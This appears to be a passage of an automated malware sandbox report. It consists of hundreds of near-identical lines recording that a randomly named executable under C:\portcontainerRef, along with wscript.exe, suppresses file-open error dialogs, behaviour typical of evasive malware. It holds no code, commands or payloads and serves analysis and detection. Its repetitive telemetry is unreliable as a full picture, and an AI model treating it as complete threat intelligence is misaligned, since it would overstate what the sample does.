            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
